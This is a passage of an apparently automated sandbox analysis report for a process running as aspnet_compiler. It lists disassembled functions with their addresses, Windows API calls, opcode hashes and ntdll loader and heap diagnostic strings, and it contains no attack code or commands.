                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c88c50a147dddc3356928fa356b09f91dce17060a49262e883d9acd556692805
                                                              • Instruction ID: 4edfbe1804ddd4bce89d2e671a3b0c2bd784bc7093c74cd41477dff196d881e5
                                                              • Opcode Fuzzy Hash: c88c50a147dddc3356928fa356b09f91dce17060a49262e883d9acd556692805
                                                              • Instruction Fuzzy Hash: 58900231A0550402D10071584514706101597D0201F66C511B0428568DC7998A5276A2
                                                              Function 0042C0E3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 44 42c0e3-42c121 call 404593 call 42cf73 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                              • Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
                                                              • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                              • Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8
                                                              Function 0042C0A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 39 42c0a3-42c0e1 call 404593 call 42cf73 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                              • Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
                                                              • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                              • Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8
                                                              Function 0042C123 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 54 42c123-42c15c call 404593 call 42cf73 ExitProcess
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                              • Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
                                                              • Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                              • Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4
                                                              Function 01A22C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 59 1a22c0a-1a22c0f 60 1a22c11-1a22c18 59->60 61 1a22c1f-1a22c26 LdrInitializeThunk 59->61
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
                                                              • Instruction ID: bea7e14b897860535c0148af998dd2fca7d218b9228ed5d5213523b5794349a9
                                                              • Opcode Fuzzy Hash: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
                                                              • Instruction Fuzzy Hash: 15B09B71D015D5C5DA11E7644608717791077D0701F16C172F2034741F473CC5D1F275

                                                              Non-executed Functions

                                                              Function 01A62349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
                                                              • Instruction ID: 5488dde0dd373dcc2350bfb6eab631f7460f30a87ffdc8dc7293d06694eeb1b9
                                                              • Opcode Fuzzy Hash: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
                                                              • Instruction Fuzzy Hash: CE927E71604742ABE721DF28C880B6BBBE8FF84750F04492EFA99D7251D774E845CB92
                                                              Function 01A18620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Critical section address., xrefs: 01A55502
                                                              • Invalid debug info address of this critical section, xrefs: 01A554B6
                                                              • Critical section debug info address, xrefs: 01A5541F, 01A5552E
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A554CE
                                                              • Address of the debug info found in the active list., xrefs: 01A554AE, 01A554FA
                                                              • Critical section address, xrefs: 01A55425, 01A554BC, 01A55534
                                                              • Thread identifier, xrefs: 01A5553A
                                                              • double initialized or corrupted critical section, xrefs: 01A55508
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A5540A, 01A55496, 01A55519
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01A55543
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A554E2
                                                              • corrupted critical section, xrefs: 01A554C2
                                                              • undeleted critical section in freed memory, xrefs: 01A5542B
                                                              • 8, xrefs: 01A552E3
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 66a0c1c0065a06ce8f9ed200fdebc7fc46cf94a1186b270c9e203834d0b2007b
                                                              • Instruction ID: 227fd295461faea784efb12e8661b9a8a5dd07abf92621ed53e84936700a2b4b
                                                              • Opcode Fuzzy Hash: 66a0c1c0065a06ce8f9ed200fdebc7fc46cf94a1186b270c9e203834d0b2007b
                                                              • Instruction Fuzzy Hash: 7081BBB0E40358EFEB60CF99C845BAEBBB5BB88B14F14411DF949B7241D3B5A941CB60
                                                              Function 01A129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A52602
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A524C0
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A52624
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A5261F
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A52498
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A52506
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A52412
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A525EB
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A522E4
                                                              • @, xrefs: 01A5259B
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A52409
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: 77da295c228e65c52c9b16a71bac2113a08004c1c88b814f1402846f226d8850
                                                              • Instruction ID: da6fac63fb637f51d106756b1187bfda2f4d7a1d6adcab19e52b2536960bd5f1
                                                              • Opcode Fuzzy Hash: 77da295c228e65c52c9b16a71bac2113a08004c1c88b814f1402846f226d8850
                                                              • Instruction Fuzzy Hash: 3B0280B1D042299FDB71DB54CD80BAAB7B8AB54704F0441EAEB4DA7241D7309F84CF59
                                                              Function 01A88B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: 65652daa801727dbaa238a80ab06e7a22975cb40c6f9377eecf03d75ba35a757
                                                              • Instruction ID: e36a34a5b26668fa0687bf05ed26217ad6383db07c233dd370450b9d5377baed
                                                              • Opcode Fuzzy Hash: 65652daa801727dbaa238a80ab06e7a22975cb40c6f9377eecf03d75ba35a757
                                                              • Instruction Fuzzy Hash: F651CFB15043119BC329EF588984BABBBE8BFD4640F544A1DE999C3284EB78D608C792
                                                              Function 01A90274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: fd4b03bea6f12c555504323a941ede1ed1b2f877fede28cb9437b686fb125e11
                                                              • Instruction ID: 8eb5a69ca958fc798c00623859a46e8128e9d8d264401c7e229700c5cc15fe8b
                                                              • Opcode Fuzzy Hash: fd4b03bea6f12c555504323a941ede1ed1b2f877fede28cb9437b686fb125e11
                                                              • Instruction Fuzzy Hash: 8BD1FD35600682DFDF22DF68C640AAEBBF5FF8A754F098059F58A9B612C7349981CB50
                                                              Function 01A689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • VerifierDebug, xrefs: 01A68CA5
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A68A3D
                                                              • HandleTraces, xrefs: 01A68C8F
                                                              • VerifierFlags, xrefs: 01A68C50
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A68A67
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01A68B8F
                                                              • VerifierDlls, xrefs: 01A68CBD
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: 432d43952d58086e444899b78d5a6e2c44f60efcea768fed9bc083fe55296cad
                                                              • Instruction ID: 4a500150ea19c79cf5e6064c808bc20b0bf33754a497a450af6d516795e94025
                                                              • Opcode Fuzzy Hash: 432d43952d58086e444899b78d5a6e2c44f60efcea768fed9bc083fe55296cad
                                                              • Instruction Fuzzy Hash: 44911472A42B12EFD721DF68C990B6B77BCABA4B14F05441CFA466B244C738DC05CBA1
                                                              Function 01A64DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ***Exception thrown within loader***, xrefs: 01A64E27
                                                              • Execute '.cxr %p' to dump context, xrefs: 01A64EB1
                                                              • minkernel\ntdll\ldrutil.c, xrefs: 01A64E06
                                                              • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01A64E38
                                                              • LdrpProtectedCopyMemory, xrefs: 01A64DF4
                                                              • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01A64DF5
                                                              • LdrpGenericExceptionFilter, xrefs: 01A64DFC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-2973941816
                                                              • Opcode ID: 1f644add543dd26cf199906372769a9ff970d5437862bc38ca874f548a622b45
                                                              • Instruction ID: 69c41b3d44dde858e2270f426c9218cb48388f2ab9532382c373942872447bfc
                                                              • Opcode Fuzzy Hash: 1f644add543dd26cf199906372769a9ff970d5437862bc38ca874f548a622b45
                                                              • Instruction Fuzzy Hash: 7E21ADF71882017FE72CAB6C8E45EB67BADFFC9D60F144109F25697581C560DE21C222
                                                              Function 019EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: cd2c13f0421cb966b81b100be4bd3ebb7b8da466882f609be0196cf7c1e03503
                                                              • Instruction ID: aa913948ee71f3e861112b51be12079256ed5292b08972df1bccfc55cdc00671
                                                              • Opcode Fuzzy Hash: cd2c13f0421cb966b81b100be4bd3ebb7b8da466882f609be0196cf7c1e03503
                                                              • Instruction Fuzzy Hash: 5CA24C74A0562A8FDF65DF18CD88BA9BBB5BF89304F1442EAD50DA7251DB319E81CF00
                                                              Function 01A163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: 92257a3334aa6f6b7b64f9a68e1482a114d0c7a4078f9320c19ae47969bdf910
                                                              • Instruction ID: fbb561acad7e0c04580e4aa7700920de2b8a14b9356e07820a8e2f4c0e7c70ad
                                                              • Opcode Fuzzy Hash: 92257a3334aa6f6b7b64f9a68e1482a114d0c7a4078f9320c19ae47969bdf910
                                                              • Instruction Fuzzy Hash: D1919E70F45B219BEB35DF18DA44BAE7BB1BF44B24F04001CED09AB285E7B49842C791
                                                              Function 019D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A399ED
                                                              • apphelp.dll, xrefs: 019D6496
                                                              • LdrpInitShimEngine, xrefs: 01A399F4, 01A39A07, 01A39A30
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A39A01
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A39A2A
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A39A11, 01A39A3A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 619dbcb3a93719e13601e3cbb2b304956939497816a4fb0f444453c748289899
                                                              • Instruction ID: f2228455e43fcc2eed35c4cb335780d23467c01e3ac83c3ad95e12d098b42005
                                                              • Opcode Fuzzy Hash: 619dbcb3a93719e13601e3cbb2b304956939497816a4fb0f444453c748289899
                                                              • Instruction Fuzzy Hash: 0551B0716087059FE720DF28D881BAB77E8FBC4B48F40491DF58A97190D670E946CB93
                                                              Function 01A1C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializeProcess, xrefs: 01A1C6C4
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01A58181, 01A581F5
                                                              • LdrpInitializeImportRedirection, xrefs: 01A58177, 01A581EB
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A581E5
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A1C6C3
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01A58170
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: caa5495ec603b57c4ff663ed049d162972cf01058de6106ea6c6ee1aa0b61e87
                                                              • Instruction ID: e47b2ac19dc9cfccf45242b0bc1368970d0d13c7c7cf1ae3f299a1fb69eb6f65
                                                              • Opcode Fuzzy Hash: caa5495ec603b57c4ff663ed049d162972cf01058de6106ea6c6ee1aa0b61e87
                                                              • Instruction Fuzzy Hash: 6B31F5716487469BC324EF29DA45E2A77A4FFD4B20F04091CF9856B295E630ED05C7A2
                                                              Function 01A12674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01A52160, 01A5219A, 01A521BA
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A5219F
                                                              • SXS: %s() passed the empty activation context, xrefs: 01A52165
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A521BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A52178
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A52180
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: e1fca1835659294312a602a7e93f3fda59838a4942e5d8df27b1ae32731daece
                                                              • Instruction ID: 1c0ea0c1bc0cf1ec5350b619c55840b7420858f08b9a55c38cbcc84029787263
                                                              • Opcode Fuzzy Hash: e1fca1835659294312a602a7e93f3fda59838a4942e5d8df27b1ae32731daece
                                                              • Instruction Fuzzy Hash: DE31E936B40315BBE7259ADA9C81F6B7B78EB94E50F19005EFB087B144D270DA00CBA2
                                                              Function 01A2096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 01A22DF0: LdrInitializeThunk.NTDLL ref: 01A22DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20D74
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: 00a5918febedd15e664ff63720fc0686aec9e4443951062978a3fb370a944b1d
                                                              • Instruction ID: d03b597e291d750fcfef4bd4b168861dd05499f8cae41e27290fd1e590eb2535
                                                              • Opcode Fuzzy Hash: 00a5918febedd15e664ff63720fc0686aec9e4443951062978a3fb370a944b1d
                                                              • Instruction Fuzzy Hash: 3E426B71900715DFDB61CF28C980BAAB7F5FF04314F1445AAE999EB241E770AA85CF60
                                                              Function 019EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: c897b17997e2ba525e20b22ef8df723d7b72889a40fb24b0ed007cf753226268
                                                              • Instruction ID: 4650b3ae73c28947ae2d34890a1e45b548e9814b06945c76578b75dd5a134654
                                                              • Opcode Fuzzy Hash: c897b17997e2ba525e20b22ef8df723d7b72889a40fb24b0ed007cf753226268
                                                              • Instruction Fuzzy Hash: 85C19D75108382CFD712CF58C548B6AB7E4FF84704F048D6AF9998B2A1E734CA49CB56
                                                              Function 01A18402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A1855E
                                                              • LdrpInitializeProcess, xrefs: 01A18422
                                                              • @, xrefs: 01A18591
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A18421
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: 37a6268caa98a1837d0a122a529b093b9c93346538b457e39bc5d9af12983c29
                                                              • Instruction ID: 3d113d85d2ea5c614762cf02c2131f771f950b65fbecb83fd8fafc2541a21e9d
                                                              • Opcode Fuzzy Hash: 37a6268caa98a1837d0a122a529b093b9c93346538b457e39bc5d9af12983c29
                                                              • Instruction Fuzzy Hash: 1B919D71548345AFD721EF25CD80FABBAE8FF84794F44092EFA8892155E738D904CB62
